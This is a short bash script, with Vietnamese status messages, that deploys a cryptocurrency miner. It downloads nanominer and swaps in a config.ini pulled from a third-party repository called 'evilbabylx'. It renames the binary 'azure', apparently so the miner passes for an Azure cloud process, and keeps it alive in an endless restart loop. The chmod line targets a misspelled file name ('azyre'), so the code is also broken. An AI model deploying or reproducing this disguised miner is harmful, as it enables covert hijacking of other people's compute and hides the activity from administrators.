#! /bin/bash
set -x #echo on
if [ -f ${PWD}/nanominer-linux-1.5.3.tar.gz ]; then
    if pgrep -x "azure" > /dev/null
then
    echo "scrip dang chay roi , ke cmn di "
    
else

echo "script da install , chay thoi "
cd nanominer-linux-1.5.3
while (true);do if pgrep -x "azure" > /dev/null; then echo "Miner dang chay roi , ke cmn di";else echo "Miner da install , chay thoi" && ./azure;fi; sleep 30; done

     
fi
exit
fi

wget https://github.com/nanopool/nanominer/releases/download/v1.5.3/nanominer-linux-1.5.3.tar.gz
tar xvzf nanominer-linux-1.5.3.tar.gz
cd nanominer-linux-1.5.3
rm config.ini
wget https://raw.githubusercontent.com/evilbabylx/script/master/config.ini
mv nanominer azure
chmod +x azyre
while (true);do if pgrep -x "azure" > /dev/null; then echo "Miner dang chay roi , ke cmn di";else echo "Miner da install , chay thoi" && ./azure;fi; sleep 30; done
